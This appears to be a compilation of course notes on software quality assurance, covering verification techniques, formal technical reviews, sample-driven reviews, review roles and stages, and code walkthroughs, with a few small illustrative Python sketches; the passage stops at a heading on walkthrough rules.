■■ Desk debugging. This can be a formal or informal process used by a worker to check the accuracy and completeness of his/her work. It is most beneficial when the process is formalized so that the worker has a predefined series of steps to perform. The objective is basically the same as an inspection, tracing the entrance criteria to the exit criteria; unlike the inspection, however, it is performed by the worker who completed the task.

■■ Requirements tracing. Requirements tracing, sometimes called quality function deployment (QFD), ensures that requirements are not lost during implementation. Once defined, the requirements are uniquely identified. They are then traced from work step to work step to ensure that all the requirements have been processed correctly through the completion of that process.


■■ Testable requirements. A testable requirement has a built-in validation technique. Incorporation of testable requirements is sometimes referred to as developing a "base case," meaning that the method of testing all the requirements has been defined. If you use this method, the requirements phase of software development or contracting cannot be considered complete until the testable component of each requirement has been defined. Some organizations use testers to help define and/or agree to a test that will validate the requirements.

■■ Test factor analysis. This verification technique is unique to the test process incorporated in this book. It is based on the test factors described in an earlier chapter. Under this analysis, a series of questions helps determine whether those factors have been appropriately integrated into the software development process. Note that these test factors are attributes of requirements such as ease of use.

■■ Success factors. Success factors are the factors that normally the customer/user will define as the basis for evaluating whether the software system meets their needs. Success factors correlate closely to project objectives but are in measurable terms so that it can be determined whether the success factor has been met. Acceptance criteria are frequently used as the success factors.

■■ Risk matrix. The objective of a risk matrix is to evaluate the effectiveness of controls to reduce identified risks. (Controls are the means organizations use to minimize or eliminate risk.) The risk matrix requires the identification of risks, and then the matching of controls to those risks so an assessment can be made as to whether the risk has been minimized to an acceptable level.

■■ Static analysis. Most static analysis is performed through software. For example, most source code compilers have a static analyzer that provides information as to whether the source code has been correctly prepared. Other static analyzers examine code for such things as "non-entrant modules," meaning that for a particular section of code there is no way to enter that code.

These techniques are incorporated into the verification process of the requirements, design, or programming phase. However, just because a specific technique is included in one phase of development does not mean it cannot be used in other phases. Also, some of the techniques can be used in conjunction with one another; for example, a review can be coupled with requirements tracing.
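As a small sketch of requirements tracing, the fragment below builds a toy traceability matrix mapping uniquely identified requirements to the work products that implement and test them; the identifiers and structure are illustrative assumptions, not part of the technique's definition:

# Toy traceability matrix: requirement ID -> work products that cover it.
traceability = {
    "REQ-001": {"design": "DD-4.2", "code": "billing.py", "test": "TC-101"},
    "REQ-002": {"design": "DD-4.3", "code": "invoice.py", "test": None},
    "REQ-003": {"design": None, "code": None, "test": None},
}

def untraced(matrix: dict) -> dict:
    """Report requirements with gaps in any work step (lost requirements)."""
    return {req: [step for step, artifact in steps.items() if artifact is None]
            for req, steps in matrix.items()
            if any(artifact is None for artifact in steps.values())}

print(untraced(traceability))
# {'REQ-002': ['test'], 'REQ-003': ['design', 'code', 'test']}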

Objective

Research has shown that the longer it takes to find and correct a defect, the more costly the correction process becomes. The objectives of verification testing during the requirements, design, and programming phases are twofold. The first is to identify defects as close to the point where they originated as possible. This will speed up development and at the same time reduce the cost of development. The second objective is to identify improvement opportunities. Experienced testers can advise the development group of better ways to implement user requirements, to improve the software design, and/or to make the code more effective and efficient.


Concerns

Testers should have the following concerns when selecting and executing verificationtesting:

■■ Assurance that the best verification techniques will be used. The verificationtechnique can be determined during the development of the test plan or asdetailed verification planning occurs prior to or during an early part of the devel-opmental phase. Based on the objectives to be accomplished, testers will selectone or more of the verification techniques to be used for a specific developmentalphase.

■■ Assurance that the verification technique will be integrated into a developmental process. Development should be a single process, not two parallel processes of developing and testing during implementation. Although the two processes are performed by potentially different groups, they should be carefully integrated so that development looks like a single process. This is important so that both developers and testers know when, and by whom, a specific task is to be accomplished. Without this, developers may not notify testers that a particular phase has begun or ended, or may not budget the developer's time, so that testers are unable to perform the verification technique. If verification has been integrated into the developmental process, verification will be performed.

■■ Assurance that the right staff and appropriate resources will be available when the technique is scheduled for execution. Scheduling the staff and funding the execution of the verification technique should occur in parallel with the previous action of integrating the technique into the process. It is merely the administrative component of integration, which includes determining who will execute the technique, when the technique will be executed, and the amount of resources allocated to the execution of the technique.

■■ Assurance that those responsible for the verification technique are adequately trained. If testers who perform the verification technique have not been previously trained, their training should occur prior to executing the verification technique.

■■ Assurance that the technique will be executed properly. The technique should be executed in accordance with the defined process and schedule.

Workbench

Figure 9-1 illustrates the workbench for performing verification testing. The input to the workbench is the documentation prepared by the development team for the phase being tested. Near the end of the requirements, design, and programming phases, the appropriate verification technique will be performed. The quality control procedures are designed to ensure the verification techniques were performed correctly. At the end of each development phase test, testers should list the defects they've uncovered, plus any recommendations for improving the effectiveness and efficiency of the software.



Figure 9-1 The workbench for verification testing. [Figure: the workbench takes as input the documentation for the phase being tested; its tasks are Task 1, test during the requirements phase; Task 2, test during the design phase; and Task 3, test during the programming phase. A check step confirms that each verification technique was performed correctly, with rework where it was not, and the output is a list of defects and recommendations.]


Input

This section describes the inputs required to complete the verification testing during each phase of development: requirements, design, and programming.

The Requirements Phase

The requirements phase is undertaken to solve a business problem. The problem and its solution drive the system's development process. Therefore, it is essential that the business problem be well defined. For example, the business problem might be to improve accounts receivable collections, reduce the amount of on-hand inventory through better inventory management, or improve customer service.

The analogy of building a home illustrates the phases in a system's development life cycle. The homeowner's needs might include increased living space, and the results of the requirements phase offer a solution for that need. The requirements phase in building a home would specify the number of rooms, the location of the lot on which the house will be built, the approximate cost to construct the house, the type of architecture, and so on. At the completion of the requirements phase, the potential homeowner's needs would be specified. The deliverables produced from the homeowner's requirements phase would be a functional description of the home and a plot map of the lot on which the home is to be constructed. These are the inputs that go to the architect to design the home.

The requirements phase should be initiated by management request and should conclude with a proposal to management on the recommended solution for the business need. The requirements team should study the business problem, the previous methods of handling the problem, and the consequences of that method, together with any other input pertinent to the problem. Based on this study, the team develops a series of solutions. The requirements team should then select a preferred solution from among these alternatives and propose that solution to management.

The most common deliverables from the requirements phase needed by the testers for this step include the following:

■■ Proposal to management describing the problem and the alternatives, and proposing a solution

■■ Cost/benefit study describing the economics of the proposed solution

■■ Detailed description of the recommended solution, highlighting the recommended method for satisfying those needs. (Note: This becomes the input to the systems design phase.)

■■ List of system assumptions, such as the life of the project, the value of the system, the average skill of the user, and so on

The Design Phase

The design phase verification process has two inputs: the test team's understanding of how design, both internal and external, occurs; and the deliverables produced during the design phase that will be subject to a static test.



The design process could result in an almost infinite number of solutions. The system design is selected based on an evaluation of multiple criteria, including available time, desired efficiency, skill of the project team, and hardware and software available, as well as the requirements of the system itself. The design will also be affected by the methodology and tools available to assist the project team.

In home building, the design phase equivalent is the development of blueprints and the bill of materials for supplies needed. It is much easier to make changes in the early phases of design than in later phases.

From a project perspective, the most successful testing is that conducted early in the design phase. The sooner the project team becomes aware of potential defects, the cheaper it is to correct those defects. If the project waited until the end of the design phase to begin testing, it would fall into the same trap as many projects that wait until the end of programming to conduct their first tests: When defects are found, the corrective process can be so time-consuming and painful that it may appear cheaper to live with the defects than to correct them.

Testing normally occurs using the deliverables produced during the design phase. The more common design phase deliverables include the following:

Input specifications

Processing specifications

File specifications

Output specifications

Control specifications

System flowcharts

Hardware and software requirements

Manual operating procedure specifications

Data retention policies

The Programming Phase

The more common programming phase deliverables that are input for testing are as follows:

Program specifications

Program documentation

Computer program listings

Executable programs

Program flowcharts

Operator instructions

In addition, testers need to understand the process used to build the program under test.



Walkthroughs, Code Reviews, and Inspections

Our objective with Inspections is to reduce the Cost of Quality by finding and removing defects earlier and at a lower cost. While some testing will always be necessary, we can reduce the costs of test by reducing the volume of defects propagated to test.

—Ron Radice (2002)

When you catch bugs early, you also get fewer compound bugs. Compound bugs are two separate bugs that interact: you trip going downstairs, and when you reach for the handrail it comes off in your hand.

—Paul Graham (2001)

Here’s a shocker: your main quality objective in software development is to get a working program to your user that meets all their requirements and has no defects. That’s right: your code should be perfect. It meets all the user’s requirements and it has no errors in it when you deliver it. Impossible, you cry? Can’t be done? Well, software quality assurance is all about trying to get as close to perfection as you can – albeit within time and budget. (You knew there was a catch, didn’t you?)

Software quality is usually discussed from two different perspectives, the user's and the developer's. From the user's perspective, quality has a number of characteristics – things that your program must do in order to be accepted by the user – among which are:

• Correctness: The software has to work, period.

• Usability: It has to be easy to learn and easy to use.




• Reliability: It has to stay up and be available when you need it.

• Security: The software has to prevent unauthorized access and it has to protect your data.

• Adaptability: It should be easy to add new features.

From the developer’s perspective, things are a bit different. The developer wants to see the following:

• Maintainability: It has to be easy to make changes to the software.

• Portability: It has to be easy to move the software to a different platform.

• Readability: Many developers won't admit this, but you do need to be able to read the code.

• Understandability: The code needs to be designed in such a way that a new developer can understand how it all hangs together.

• Testability: Well, at least the testers think that your code should be easy to test. Code that is created in a modular fashion, with short functions that do only one thing, is much easier to understand and test than code that is all just one big main() function.

Software Quality Assurance (SQA) has three legs to it:

• Testing: Finding the errors that surface while your program is executing, also known as dynamic analysis.

• Debugging: Getting all the obvious errors out of your code, the ones that are found by testing it.

• Reviews: Finding the errors that are inherently in your code as it sits there, also known as static analysis.

Many developers – and managers – think that you can test your way to quality. You can't. As we saw in the last chapter, tests are limited. You often can't explore every code path, you can't test every possible data combination, and often your tests themselves are flawed. Tests can only get you so far. As Edsger Dijkstra famously said, “...program testing can be a very effective way to show the presence of bugs, but it is hopelessly inadequate for showing their absence.”

Reviewing your code – reading it and looking for errors on the page – provides another mechanism for making sure that you’ve implemented the user’s requirements and the resulting design correctly. In fact, most development organizations that use a plan-driven methodology will not only review code, they’ll also review the requirements document, the architecture, the design specification, the test plan, the tests themselves, and the user documentation. In short, all the work products produced by the software development organization. Organizations that use an agile development methodology don’t necessarily have all the documents mentioned above, but they do have requirements, user stories, user documentation, and especially code to review. In this chapter we’ll focus on reviewing your code.


15.5 INFORMAL REVIEWS

Informal reviews include a simple desk check of a software engineering work product with a colleague, a casual meeting (involving more than two people) for the purpose of reviewing a work product, or the review-oriented aspects of pair programming (Chapter 3).

A simple desk check or a casual meeting conducted with a colleague is a review. However, because there is no advance planning or preparation, no agenda or meeting structure, and no follow-up on the errors that are uncovered, the effectiveness of such reviews is considerably lower than more formal approaches. But a simple desk check can and does uncover errors that might otherwise propagate further into the software process.

One way to improve the efficacy of a desk check review is to develop a set of simple review checklists for each major work product produced by the software team. The questions posed within the checklist are generic, but they will serve to guide the reviewers as they check the work product. For example, let's reexamine a desk check of the interface prototype for SafeHomeAssured.com. Rather than simply playing with the prototype at the designer's workstation, the designer and a colleague examine the prototype using a checklist for interfaces:

• Is the layout designed using standard conventions? Left to right? Top to bottom?
• Does the presentation need to be scrolled?
• Are color and placement, typeface, and size used effectively?
• Are all navigation options or functions represented at the same level of abstraction?
• Are all navigation choices clearly labeled?




and so on. Any errors or issues noted by the reviewers are recorded by the designer for resolution at a later time. Desk checks may be scheduled in an ad hoc manner, or they may be mandated as part of good software engineering practice. In general, the amount of material to be reviewed is relatively small and the overall time spent on a desk check spans little more than one or two hours.

In Chapter 3, I described pair programming in the following manner: “XP recommends that two people work together at one computer workstation to create code for a story. This provides a mechanism for real-time problem solving (two heads are often better than one) and real-time quality assurance.”

Pair programming can be characterized as a continuous desk check. Rather than scheduling a review at some point in time, pair programming encourages continuous review as a work product (design or code) is created. The benefit is immediate discovery of errors and better work product quality as a consequence.

In their discussion of the efficacy of pair programming, Williams and Kessler [Wil00] state:

Anecdotal and initial statistical evidence indicates that pair programming is a powerful technique for productively generating high quality software products. The pair works and shares ideas together to tackle the complexities of software development. They continuously perform inspections on each other's artifacts leading to the earliest, most efficient form of defect removal possible. In addition, they keep each other intently focused on the task at hand.

Some software engineers argue that the inherent redundancy built into pair programming is wasteful of resources. After all, why assign two people to a job that one person can accomplish? The answer to this question can be found in Section 15.3.2. If the quality of the work product produced as a consequence of pair programming is significantly better than the work of an individual, the quality-related savings can more than justify the “redundancy” implied by pair programming.




15.6 FORMAL TECHNICAL REVIEWS

A formal technical review (FTR) is a software quality control activity performed by software engineers (and others). The objectives of an FTR are: (1) to uncover errors in function, logic, or implementation for any representation of the software; (2) to verify that the software under review meets its requirements; (3) to ensure that the software has been represented according to predefined standards; (4) to achieve software that is developed in a uniform manner; and (5) to make projects more manageable. In addition, the FTR serves as a training ground, enabling junior engineers to observe different approaches to software analysis, design, and implementation. The FTR also serves to promote backup and continuity because a number of people become familiar with parts of the software that they may not have otherwise seen.

The FTR is actually a class of reviews that includes walkthroughs and inspections. Each FTR is conducted as a meeting and will be successful only if it is properly planned, controlled, and attended. In the sections that follow, guidelines similar to those for a walkthrough are presented as a representative formal technical review. If you have interest in software inspections, as well as additional information on walkthroughs, see [Rad02], [Wie02], or [Fre90].

15.6.1 The Review Meeting

Regardless of the FTR format that is chosen, every review meeting should abide by the following constraints:

• Between three and five people (typically) should be involved in the review.
• Advance preparation should occur but should require no more than two hours of work for each person.
• The duration of the review meeting should be less than two hours.

Given these constraints, it should be obvious that an FTR focuses on a specific (and small) part of the overall software. For example, rather than attempting to review an entire design, walkthroughs are conducted for each component or small group of components. By narrowing the focus, the FTR has a higher likelihood of uncovering errors.

The focus of the FTR is on a work product (e.g., a portion of a requirements model, a detailed component design, source code for a component). The individual who has developed the work product—the producer—informs the project leader that the work product is complete and that a review is required. The project leader contacts a review leader, who evaluates the product for readiness, generates copies of product materials, and distributes them to two or three reviewers for advance preparation. Each reviewer is expected to spend between one and two hours reviewing the product, making notes, and otherwise becoming familiar with the work. Concurrently, the review leader also reviews the product and establishes an agenda for the review meeting, which is typically scheduled for the next day.


“There is no urge so great as for one man to edit another man's work.”
—Mark Twain

WebRef: The NASA SATC Formal Inspection Guidebook can be downloaded from satc.gsfc.nasa.gov/Documents/fi/gdb/fi.pdf.

An FTR focuses on a relatively small portion of a work product.



The review meeting is attended by the review leader, all reviewers, and the producer. One of the reviewers takes on the role of a recorder, that is, the individual who records (in writing) all important issues raised during the review. The FTR begins with an introduction of the agenda and a brief introduction by the producer. The producer then proceeds to “walk through” the work product, explaining the material, while reviewers raise issues based on their advance preparation. When valid problems or errors are discovered, the recorder notes each.

At the end of the review, all attendees of the FTR must decide whether to: (1) accept the product without further modification, (2) reject the product due to severe errors (once corrected, another review must be performed), or (3) accept the product provisionally (minor errors have been encountered and must be corrected, but no additional review will be required). After the decision is made, all FTR attendees complete a sign-off, indicating their participation in the review and their concurrence with the review team's findings.

15.6.2 Review Reporting and Record Keeping

During the FTR, a reviewer (the recorder) actively records all issues that have been raised. These are summarized at the end of the review meeting, and a review issues list is produced. In addition, a formal technical review summary report is completed. A review summary report answers three questions:

1. What was reviewed?

2. Who reviewed it?

3. What were the findings and conclusions?

The review summary report is a single-page form (with possible attachments). It becomes part of the project historical record and may be distributed to the project leader and other interested parties.

The review issues list serves two purposes: (1) to identify problem areas within the product and (2) to serve as an action item checklist that guides the producer as corrections are made. An issues list is normally attached to the summary report.

You should establish a follow-up procedure to ensure that items on the issues list have been properly corrected. Unless this is done, it is possible that issues raised can “fall between the cracks.” One approach is to assign the responsibility for follow-up to the review leader.

15.6.3 Review Guidelines

Guidelines for conducting formal technical reviews must be established in advance, distributed to all reviewers, agreed upon, and then followed. A review that is uncontrolled can often be worse than no review at all. The following represents a minimum set of guidelines for formal technical reviews:

1. Review the product, not the producer. An FTR involves people and egos. Conducted properly, the FTR should leave all participants with a warm feeling of accomplishment. Conducted improperly, the FTR can take on the aura of an inquisition. Errors should be pointed out gently; the tone of the meeting should be loose and constructive; the intent should not be to embarrass or belittle. The review leader should conduct the review meeting to ensure that the proper tone and attitude are maintained and should immediately halt a review that has gotten out of control. (Two margin notes from the source are worth keeping here: in some situations it's a good idea to have someone other than the producer walk through the product undergoing review, which leads to a literal interpretation of the work product and better error recognition; and don't point out errors harshly, since one way to be gentle is to ask a question that enables the producer to discover the error.)

2. Set an agenda and maintain it. One of the key maladies of meetings of all types is drift. An FTR must be kept on track and on schedule. The review leader is chartered with the responsibility for maintaining the meeting schedule and should not be afraid to nudge people when drift sets in.

3. Limit debate and rebuttal. When an issue is raised by a reviewer, there may not be universal agreement on its impact. Rather than spending time debating the question, the issue should be recorded for further discussion off-line.

4. Enunciate problem areas, but don't attempt to solve every problem noted. A review is not a problem-solving session. The solution of a problem can often be accomplished by the producer alone or with the help of only one other individual. Problem solving should be postponed until after the review meeting.

5. Take written notes. It is sometimes a good idea for the recorder to make notes on a wall board, so that wording and priorities can be assessed by other reviewers as information is recorded. Alternatively, notes may be entered directly into a notebook computer.

6. Limit the number of participants and insist upon advance preparation. Two heads are better than one, but 14 are not necessarily better than 4. Keep the number of people involved to the necessary minimum. However, all review team members must prepare in advance. Written comments should be solicited by the review leader (providing an indication that the reviewer has reviewed the material).

7. Develop a checklist for each product that is likely to be reviewed. A checklist helps the review leader to structure the FTR meeting and helps each reviewer to focus on important issues. Checklists should be developed for analysis, design, code, and even testing work products.

8. Allocate resources and schedule time for FTRs. For reviews to be effective, they should be scheduled as tasks during the software process. In addition, time should be scheduled for the inevitable modifications that will occur as the result of an FTR.

9. Conduct meaningful training for all reviewers. To be effective, all review participants should receive some formal training. The training should stress both process-related issues and the human psychological side of reviews. Freedman and Weinberg [Fre90] estimate a one-month learning curve for every 20 people who are to participate effectively in reviews.


“A meeting is too often an event in which minutes are taken and hours are wasted.”
—Author unknown

“It is one of the most beautiful compensations of life, that no man can sincerely try to help another without helping himself.”
—Ralph Waldo Emerson



10. Review your early reviews. Debriefing can be beneficial in uncovering problems with the review process itself. The very first product to be reviewed should be the review guidelines themselves.

Because many variables (e.g., number of participants, type of work products, timing and length, specific review approach) have an impact on a successful review, a software organization should experiment to determine what approach works best in a local context.

15.6.4 Sample-Driven Reviews

In an ideal setting, every software engineering work product would undergo a formal technical review. In the real world of software projects, resources are limited and time is short. As a consequence, reviews are often skipped, even though their value as a quality control mechanism is recognized.

Thelin and his colleagues [The01] suggest a sample-driven review process in which samples of all software engineering work products are inspected to determine which work products are most error prone. Full FTR resources are then focused only on those work products that are likely (based on data collected during sampling) to be error prone.

To be effective, the sample-driven review process must attempt to quantify those work products that are primary targets for full FTRs. To accomplish this, the following steps are suggested [The01]:

1. Inspect a fraction ai of each software work product i. Record the number of faults fi found within ai.

2. Develop a gross estimate of the number of faults within work product i by multiplying fi by 1/ai.

3. Sort the work products in descending order according to the gross estimate of the number of faults in each.

4. Focus available review resources on those work products that have the highest estimated number of faults.

The fraction of the work product that is sampled must be representative of the work product as a whole and large enough to be meaningful to the reviewers who do the sampling. As ai increases, the likelihood that the sample is a valid representation of the work product also increases. However, the resources required to do sampling also increase. A software engineering team must establish the best value for ai for the types of work products produced.
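The four steps above reduce to a few lines of code. A minimal sketch, assuming each work product is described by the fraction sampled (ai) and the faults found in that sample (fi); the product names and figures are illustrative:

def prioritize_for_ftr(samples):
    # samples: list of (name, a_i, f_i) tuples with 0 < a_i <= 1
    estimates = []
    for name, a_i, f_i in samples:
        est = f_i * (1.0 / a_i)     # step 2: gross estimate of total faults
        estimates.append((name, est))
    # step 3: sort descending by estimated faults
    return sorted(estimates, key=lambda pair: pair[1], reverse=True)

# step 4: review resources go to the top of this list
sampled = [("req-spec", 0.20, 3), ("design-doc", 0.25, 1), ("module-A", 0.10, 2)]
for name, est in prioritize_for_ftr(sampled):
    print(f"{name}: about {est:.0f} estimated faults")

With these invented numbers, module-A (about 20 estimated faults) would receive full FTR attention first, then req-spec (15), then design-doc (4).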


Reviews take time, but it's time well spent. However, if time is short and you have no other option, do not dispense with reviews. Rather, use sample-driven reviews.



Reviews can also have a variety of objectives, where the term ‘review objective’ identifies the main focus for a review. Typical review objectives include:

• Finding defects.
• Gaining understanding.
• Generating discussion.
• Decision making by consensus.

The way a review is conducted will depend on what its specific objective is, so a review aimed primarily at finding defects will be quite different from one that is aimed at gaining understanding of a document.

Basic Review Process

All reviews, formal and informal alike, exhibit the same basic elements of process:

• The document under review is studied by the reviewers.
• Reviewers identify issues or problems and inform the author either verbally or in a documented form, which might be as formal as raising a defect report or as informal as annotating the document under review.

• The author decides on any action to take in response to the comments and updates the document accordingly.

This basic process is always present, but in the more formal reviews it is elaborated to include additional stages and more attention to documentation and measurement.

Roles and Responsibilities in a Review

There are various roles and responsibilities defined for a review process. Within a review team, five types of participants can be distinguished: moderator, author, scribe, reviewer, and manager. Let's discuss their roles one by one:

1. The moderator:- The moderator (or review leader) leads the review process. His role is to determine the type of review, approach and the composition of the review team. The moderator also schedules the meeting, disseminates documents before the meeting, coaches other team members, paces the meeting, leads possible discussions and stores the data that is collected.

2. The author:- As the writer of the ‘document under review’, the author’s basic goal should be to learn as much as possible with regard to improving the quality of the document. The author’s task is to illuminate unclear areas and to understand the defects found.

3. The scribe/ recorder :- The scribe (or recorder) has to record each defect found and any suggestions or feedback given in the meeting for process improvement.


4. The reviewer:- The role of the reviewers is to check for defects and further improvements in accordance with the business specifications, standards, and domain knowledge.

5. The manager:- The manager is involved in the reviews as he or she decides on the execution of reviews, allocates time in project schedules, and determines whether review process objectives have been met.

Activities of a Formal Review

Reviews at the more formal end of the spectrum, such as technical reviews and inspections, share certain characteristics that differentiate them from the less formal reviews, of which walkthroughs are a typical example. The figure below shows the key stages that characterize formal reviews.

Fig.: Stages of a formal review

The following list explains the key stages in more detail:

1. Planning:

• a. Selecting the personnel—ensuring that those selected can and will add value to the process. There is little point in selecting a reviewer who will agree with everything written by the author without question. As a rule of thumb it is best to include some reviewers who are from a different part of the organization, who are known to be ‘picky’, and known to be dissenters.

• b. Reviews, like weddings, are enhanced by including ‘something old, something new, something borrowed, something blue’. In this case ‘something old’ would be an experienced practitioner; ‘something new’ would be a new or inexperienced team member; ‘something borrowed’ would be someone from a different team; ‘something blue’ would be the dissenter who is hard to please. At the earliest stage of the process a review leader must be identified. This is the person who will coordinate all of the review activity.

• c. Allocating roles—each reviewer is given a role to provide them with a unique focus on the document under review. Someone in a tester role might be checking for testability and clarity of definition, while someone in a user role might look for simplicity and a clear relationship to business values. This approach ensures that, although all reviewers are working on the same document, each individual is looking at it from a different perspective.

• d. Defining the entry and exit criteria, especially for the most formal review types (e.g. inspection).

• e. Selecting the parts of documents to be reviewed (not always required; this will depend on the size of the document: a large document may need to be split into smaller parts and each part reviewed by a different person to ensure the whole document is reviewed fully).

2. Kick-off: distributing documents; explaining the objectives, process and documents to the participants; and checking entry criteria (for more formal review types such as inspections). This can be run as a meeting or simply by sending out the details to the reviewers. The method used will depend on timescales and the volume of information to pass on. A lot of information can be disseminated better by a meeting rather than expecting reviewers to read pages of text.

3. Review entry criteria: this stage is where the entry criteria agreed earlier are checked to ensure that they have been met, so that the review can continue—this is mainly used in the more formal review types such as inspections.

4. Individual preparation: work done by each of the participants on their own before the review meeting, which would include reading the source documents, noting potential defects, questions and comments. This is a key task and may actually be time-boxed, e.g. participants may be given two hours to complete the preparation.

5. Noting incidents: in this stage the potential defects, questions and comments found during individual preparation are logged.

6. Review meeting: this may include discussion regarding any defects found, or simply just a log of defects found. The more formal review types like inspections will have documented results or minutes. The meeting participants may simply note defects for the author to correct; they might also make recommendations for handling or correcting the defects. The approach taken will have been decided at the kick-off stage so that all participants are aware of what is required of them. The decision as to which approach to take may be based on one or all of the following factors:

• a. Time available (if time is short the meeting may only collect defects).
• b. Requirements of the author (if the author would like help in correcting defects).
• c. Type of review (in an inspection only the collection of defects is allowed—there is never any discussion).

7. Examine: this includes the recording of the physical meetings or tracking any group electronic communications.

8. Rework: after a review meeting the author will have a series of defects to correct; correcting the defects is called rework.

9. Fixing defects: here the author will be fixing defects that were found and agreed as requiring a fix.

10. Follow-up: the review leader will check that the agreed defects have been addressed and will gather metrics such as how much time was spent on the review and how many defects were found. The review leader will also check the exit criteria (for more formal review types such as inspections) to ensure that they have been met.

11. Checking exit criteria: at this stage the exit criteria defined at the start of the process are checked to ensure that all exit criteria have been met so that the review can be officially closed as finished.
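Since several of the stages above hinge on entry and exit criteria being checked before the review proceeds or closes, here is a hedged sketch of such a gate; the criteria shown are invented examples, not a standard list:

def unmet(criteria):
    # criteria: list of (description, met) pairs; returns descriptions not yet met
    return [desc for desc, met in criteria if not met]

entry_criteria = [("document spell-checked and complete", True),
                  ("reviewers selected and roles allocated", True)]
exit_criteria = [("all agreed defects reworked", False),
                 ("metrics gathered (time spent, defects found)", True)]

if not unmet(entry_criteria):
    print("entry criteria met: review can continue")
print("open exit items:", unmet(exit_criteria))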

Success Factors for Reviews

When measuring the success of a particular review the following suggested success factors should be considered:

• Each review should have a clearly predefined and agreed objective and the right people should be involved to ensure the objective is met. For example, in an inspection each reviewer will have a defined role and therefore needs the experience to fulfill that role; this should include testers as valued reviewers.

• Any defects found are welcomed, and expressed objectively.
• The review should be seen as being conducted within an atmosphere of trust, so that the outcome will not be used for the evaluation of the participants, and that the people issues and psychological aspects are dealt with (e.g. making it a positive experience for the author and all participants).

Page 134: CP 7026 - Software Quality Assurance

• Review techniques (both formal and informal) should be used that are suitable to the type and level of software work-products and reviewers (this is especially important in inspections).

• Checklists or roles should be used, where appropriate, to increase effectiveness of defect identification; for example, in an inspection, roles such as data entry clerk or technical architect may be required to review a particular document.

• Management support is essential for a good review process (e.g. by incorporating adequate time for review activities in project schedules).

• There should be an emphasis on learning and process improvement.

Other more quantitative approaches to success measurement could also be used:

• Number of defects found.
• Time taken to review/inspect.
• Percentage of project budget used/saved.
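These quantitative measures are easy to compute once a review's basic figures are logged. A small illustrative calculation, with hypothetical numbers and an assumed cost model:

def review_metrics(defects_found, hours_spent, hourly_rate, cost_per_escaped_defect):
    effort_cost = hours_spent * hourly_rate
    # crude saving estimate: each defect caught now avoids a costlier later fix
    estimated_saving = defects_found * cost_per_escaped_defect - effort_cost
    return {
        "defects_per_hour": defects_found / hours_spent,
        "review_cost": effort_cost,
        "estimated_saving": estimated_saving,
    }

print(review_metrics(defects_found=12, hours_spent=6,
                     hourly_rate=80, cost_per_escaped_defect=400))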

What is a Technical Review?

A technical review is a static white-box testing technique that is conducted to spot, early in the life cycle, defects that cannot be detected by black-box testing techniques.


Technical Review Characteristics:

Page 135: CP 7026 - Software Quality Assurance

• Technical reviews are documented and use a defect-detection process that includes peers and technical specialists in the review process.
• The review process doesn't involve management participation; it is often performed as a peer review.
• It is usually led by a trained moderator who is NOT the author, but it can also be led by a technical expert.
• A report is prepared with the list of issues that need to be addressed.
• It is a less formal review; in practice, technical reviews vary from quite informal to very formal.
• Defects are found by experts (such as architects, designers, key users) who focus on the content of the document.


The goals of a technical review are to:

• assess the value of technical concepts and alternatives in the product and project environment;

• establish consistency in the use and representation of technical concepts;
• ensure, at an early stage, that technical concepts are used correctly;
• inform participants of the technical content of the document.

Key characteristics of a technical review are:

• It is a documented defect-detection process that involves peers and technical experts.

• It is often performed as a peer review without management participation.
• Ideally it is led by a trained moderator, but possibly also by a technical expert.
• A separate preparation is carried out during which the product is examined and the defects are found.
• More formal characteristics such as the use of checklists and a logging list or issue log are optional.

About the purpose of technical reviews the IEEE standard says: "The purpose of a technical review is to evaluate a software product by a team of qualified personnel to determine its suitability for its intended use and identify discrepancies from specifications and standards." In other words, the technical review is a meeting in which a team analyses a work product to see if its quality is as expected or if it needs some improvement. The standard further states that not necessarily all aspects of the review object have to be examined and that it is a possible purpose of the meeting to come up with alternatives for a better design. The list of work products to which the review can be applied is quite big: software requirements specifications, software design descriptions, software test documentation, software user documentation, maintenance manuals, system build procedures, installation procedures, and release notes are possible candidates for the review. The review meetings should be planned in the project plan or they can be held on request, e.g. by the quality group. The roles involved in a technical review are as follows:

• Decision maker
• Review leader
• Recorder
• Technical staff
• Management staff (optional)
• Other team members (optional)
• Customer or user representative (optional)


Walk-Through

A walk-through can have a twofold purpose. First of all, it can be performed to evaluate a software product with the purpose of:

1. Find anomalies
2. Improve the software product
3. Consider alternative implementations
4. Evaluate the conformance to standards and specifications

In summary you could say that this kind of walk-through is a method which should be used throughout the design phase of a software product to collect ideas and inputs from other team members which lead to an overall improvement of the product. The second objective of a walk-through is to share knowledge and perform training of the participants. It is a method to raise all team members to the same level of knowledge regarding programming styles and details of the product. In a sense it also generates agreement within the team about the object of the walk-through. The formal aspects of a walk-through have a low profile. There are only a few roles defined in the standard. There is a walk-through leader, a recorder, the author of the work product, and team members. The standard says that at least two members have to be assembled for the walk-through and the roles can be shared among them. The walk-through has to be planned, which means that the participants have to be defined and the meeting has to be scheduled. Further, the findings and outcomes of the meeting have to be recorded. In total this is a nice and easy-to-use method for everyday technical work from which you can expect good benefit.

Walkthrough:

• It is not a formal process/review.
• It is led by the author.
• The author guides the participants through the document according to his or her thought process to achieve a common understanding and to gather feedback.
• It is useful for people who are not from the software discipline and are not used to, or cannot easily understand, the software development process.
• It is especially useful for higher-level documents like requirement specifications, etc.

The goals of a walkthrough:

i. To present the documents both within and outside the software discipline in order to gather the information regarding the topic under documentation.


ii. To explain the document (knowledge transfer) and evaluate its contents

iii. To achieve a common understanding and to gather feedback.
iv. To examine and discuss the validity of the proposed solutions

Code Walkthrough is a form of peer review in which a programmer leads the review process and the other team members ask questions and spot possible errors against development standards and other issues.

• The meeting is usually led by the author of the document under review and attended by other members of the team.

• Review sessions may be formal or informal.
• Before the walkthrough meeting, reviewers prepare; afterwards, a review report with a list of findings is produced.
• The scribe, who is not the author, takes the minutes of the meeting and notes down all the defects/issues so that they can be tracked to closure.
• The main purpose of the walkthrough is to enable learning about the content of the document under review, to help team members gain an understanding of the content of the document, and also to find defects.

Where Does a Code Walkthrough Fit In?

A walkthrough is characterized by the author of the document under review guiding the participants through the document and his or her thought processes, to achieve a common understanding and to gather feedback. This is especially useful if people from outside the software discipline are present, who are not used to, or cannot easily understand software development documents.


The content of the document is explained step by step by the author, to reach consensus on changes or to gather information. Within a walkthrough the author does most of the preparation.

The participants, who are selected from different departments and backgrounds, are not required to do a detailed study of the documents in advance.

Because of the way the meeting is structured, a large number of people can participate and this larger audience can bring a great number of diverse viewpoints regarding the contents of the document being reviewed as well as serving an educational purpose.

If the audience represents a broad cross-section of skills and disciplines, it can give assurance that no major defects are 'missed' in the walk-through. A walkthrough is especially useful for higher-level documents, such as requirement specifications and architectural documents.

THE RULES OF A WALKTHROUGH

